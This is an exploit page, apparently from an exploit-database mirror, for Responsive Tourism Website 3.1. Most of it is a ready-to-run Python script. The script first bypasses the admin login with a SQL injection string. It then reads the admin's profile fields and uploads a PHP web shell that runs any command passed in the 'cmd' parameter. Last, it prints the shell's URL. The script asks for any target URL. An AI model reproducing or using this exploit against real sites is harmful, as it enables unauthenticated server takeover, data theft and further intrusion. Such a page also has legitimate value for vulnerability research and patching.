responsive tourism website 3.1 remote code execution (rce) (unauthenticated)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) # Date: 22.06.2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html # Version: V 3.1 # Tested on: MacOS & Windows import requests import random import string from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" session = requests.Session() session.get(url + 'admin/login.php') print("- Bypassing login -") login_url = url + "classes/Login.php?f=login" login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"} session.post(login_url, cookies=session.cookies.get_dict(), data=login_data) print("- Protecting User -") protectSettings_url = url + 'admin/?page=user' protectSetting_html = session.get(protectSettings_url) protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser') ids = protectSettings_parser.find('input', {'name':'id'}).get("value") firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value") lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value") username = protectSettings_parser.find('input', {'id':'username'}).get("value") print("User ID : " + ids) print("First Name : " + firstname) print("Last Name : " + lastname) print("Username : " + username) print("- OK -") let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) print("Shell uploading") upload_url = url + "classes/Users.php?f=save" upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} upload_payload = "<?php if(isset($_GET['cmd'])){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n" upload = session.post(upload_url, headers=upload_headers, data=upload_data) if upload.status_code == 200: print("- OK -") req = session.get(url + "/admin/?page=user", headers=session.headers) parser = BeautifulSoup(req.text, 'html.parser') find_shell = parser.find('img', {'id':'cimg'}) print("Shell URL : " + find_shell.get("src") + "?cmd=whoami") else: print("- NO :( -")
Responsive tourism website 3.1 remote code execution (rce) (unauthenticated) Vulnerability / Exploit Source : Responsive tourism website 3.1 remote code execution (rce) (unauthenticated)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes